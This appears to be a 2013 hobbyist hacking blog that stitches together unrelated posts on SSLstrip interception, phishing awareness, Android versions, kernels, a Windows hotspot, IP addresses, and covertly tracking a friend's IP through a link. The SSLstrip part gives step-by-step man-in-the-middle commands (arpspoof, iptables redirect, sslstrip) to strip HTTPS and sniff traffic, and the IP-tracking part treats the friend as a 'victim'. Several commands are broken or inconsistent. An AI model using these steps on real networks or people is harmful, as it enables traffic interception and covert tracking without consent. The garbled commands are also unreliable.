Hacking SSL Using SSL Strip:

Advantage of Cracking SSLStrip :
1.Address bar uses http instead of secure https.
2.Sniffing becomes easy....

Tools:
•Backtrack 5
•Arpspoof
•IP Tables
•SSL Strip
•Netstat


So first start up your Backtrack 5 terminal and type the following Command:
echo '1' > /proc/sys/net/ipv4/ip_forward

Now after typing this command the backtrack will be able to forward the packets, now we have to get some information about the gateway Ip, so to know more about our gateway IP we will type the following command:
netstat -nr

Then we are going to get some information about the gateway ip, and ARPSpoof to perform the attack

arpspoof -i eth0 192.168.8.8

In the above command eth0 represents the network interface card (NIC) or if you are using a wireless then it will be wlan0. So in our case the default gateway is 192.168.1.1.

After that we have to Download sslstrip, which you can find from the official website.

Then after we have installed sslstrip now we have to make our firewall to redirect the traffic from Port 80 to Port 8080, so to do this type the following command:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j
REDIRECT --to-port 8080

So our last step would be to make all the traffic to go from ARPspoof tables.Command:

echo '1' > /proc/sys/net/ipv4/ip_forward arpspoof -i eth0
192.168.8.8

So finally we are done, now the ARPspoof will start capturing traffic & we have to use SSLstrip now so type the command: sslstrip -l 8080 .Now you have successfully cracked the SSLstrip.

WHAT IS PHISHING:-

The act of sending an e-mail to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surroundering private information that will be used for identity theft. The e-mail directs the user to visit a Web site where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site, however, is bogus and set up only to steal the user’s information.

 

MOBILE PHISHING:

 Phishing scams are not limited to the internet. Some phishers use the telephone to make requests for information. If you get a call from your banking institution asking for personal information, hang up and call your bank directly. Your bank will have your social security number and account information on file and should only ask you to verify a few digits.

like Iphone,Apple ,iTunes n more...By SMS

EXAMPLE:-

>>Congratulations! Your mobile phone has won US$ 10 Million prize money. To claim your money, call this number XXXXXXXX,give your permanent address,pin number,account number or credit card number...

The phisher can ask like it They want your personal Information.

 Some people do the reply to phisher then after he/she can be target of Phisher... so never be reply these type of Messages or Mail.

 

In a phishing attack, the attacker creates a situation wherein people believe that they are dealing with an authorized party, like their bank or another service provider. The attacker will ask the victim for sensitive information such as credit card information.

 

Phishing attacks generally target:

    * Bank information – e.g. VISA and PayPal accounts.
    * Username and password information.
    * Social Security numbers.
    * Information which can be used to retrieve forgotten or lost credentials.

>>Follow the tips below to protect yourself against these threats:

· Your bank will never ask you to divulge account information or passwords via email. Never give out this information, especially via email.

· Don’t open emails that come from untrusted sources.

· Don’t run files that you receive via email without making sure of their origin.

· Don’t click links in emails. If they come from a known source, type them on the browser’s address bar. If they come from an untrusted source, simply ignore them, as they could take you to a web designed to download malware onto your computer.

· Keep your computer protected. Install a security solution and keep it up-to-date.


>>Protect yourself from Phishing scams that could lead to identity theft. I cannot stress this enough. Phishing scams are a hot topic lately that have grown with the popularity of online banking and social networking sites like MySpace, Facebook and Friendster.

The term Phishing comes from the analogy to "fishing". The phisher uses a bait to lure victims into giving out personal information like passwords and credit card numbers. The bait is typically and urgent plea from one of the victims friends or trusted websites, asking for information to resolve some sort of problem with their account.


>>Anti-phishing software is a must for anyone that accesses the internet. Most of the internet service providers have some safety measures included as part of their online security software. Most web browsers also have add-ons that can detect most phishing scams. Unfortunately, these measures are not enough. Some of the more clever phishers have found ways to trick the anti-phishing software so you need to be cautious of suspicious emails and messages.

Evolution of Android:

Android Cupcake (1.5)
Android Donut (1.6)
Android Eclair (2.0.1 - 2.1)
Android Froyo (2.2 - 2.2.3)
Android Gingerbread (2.3 - 2.3.7)
Android Honeycomb (3.0 - 3.1)
Android Ice Cream Sandwich (4.0 -
4.0.4)
Android Jellybean (4.1 -4.2)
Android Key Lime Pie (Yet to be announced)

Notice the pattern? Yes? No? They are categorized as Desserts and are Alphabetically ordered.
So just a guess, Android Lollipop for the next one......

KERNEL

• Kernel is the main component of most computer operating systems.
• It is a bridge between applications and the actual data processing done at the hardware level.
• The kernel's responsibilities include managing the system's resources (the communication between-hardware and software components).
• Usually as a basic component of an operating system, a kernel can provide the lowest-level abstraction layer for the resources (especially processors and I/O devices) that application software must control to perform its function.
• It typically makes these facilities available to application processes through inter-process communication mechanisms and system calls.
  

CREATE UR OWN WIFI HOT-SPOT AT HOME IN SIMPLE STEPS.....AND SHARE INTERNET CONNECTION WITH FRIENDS AND FAMILY

U Just Follow The Steps and you have done
Turn on your laptop wifi

STEP1: Open teh CMD as  "RUN AS ADMISTRATOR"

STEP 2: Type the following command ...
             

NETSH WLAN SET HOSTEDNETWORK MODE=ALLOW SSID=SHIV KEY=SHIV12345
 
Press ENTER, You will see the successful message. :)

STEP 3:Now time to start hosted network, type the command given below.

NETSH WLAN START HOSTEDNETWORK
 
STEP4:Now search for wifi netork from other devices

NW CONNECT UR LAPTOP WITH INTERNET AND  TURN ON THE NETWORK SHARING...U R DONE

================ENJOY=================

WHAT IS IP ADDRESS ??

An Internet Protocol address (IP address) is a numerical label assigned to each device (e.g., computer, printer) participating in a computer network that uses the Internet Protocol for communication.  

The Internet Protocol defines an IP address as a 32-bit number and this system, known as Internet Protocol Version 4 (IPv4), is still in use today.

However, due to the enormous growth of the Internet and the predicted depletion of available addresses, a new version of IP (IPv6), using 128 bits for the address, was developed in 1995. IPv6 was standardized as RFC 2460 in 1998, and its deployment has been ongoing since the mid-2000s.

IP addresses are binary numbers, but they are usually stored in text files and displayed in human-readable notations, such as 172.16.254.1 (for IPv4), and 2001:db8:0:1234:0:567:8:1 (for IPv6).

The Internet Assigned Numbers Authority (IANA) manages the IP address space allocations globally and delegates five regional Internet registries (RIRs) to allocate IP address blocks to local Internet registries (Internet service providers) and other entities.

12 June 2013

HOW TO FIND YOUR FRIEND IP ADDRESS WHILE CHATTIING

Step .1 Goto  chatrack

Step .2 Signup (Simple Steps)

Step .3 Click on the Image you want to redirect to your friend.

Step .4 Copy the link and send to them

Step .5 If victims click on the ling , the IP of his/her will be sended to you database, you can watch it from track result

PRENTION FROM THIS ATTACK

- Do not blindly Believe on anyone
- Do not open any link if you are not have trust on it






Thankyou....
- Shiv Shankar

Hi,
I am Shiv Shankar Sharma, Ethical Hacker.

It's my first Blog!
Here I will tell you How to Hack and Secure from it!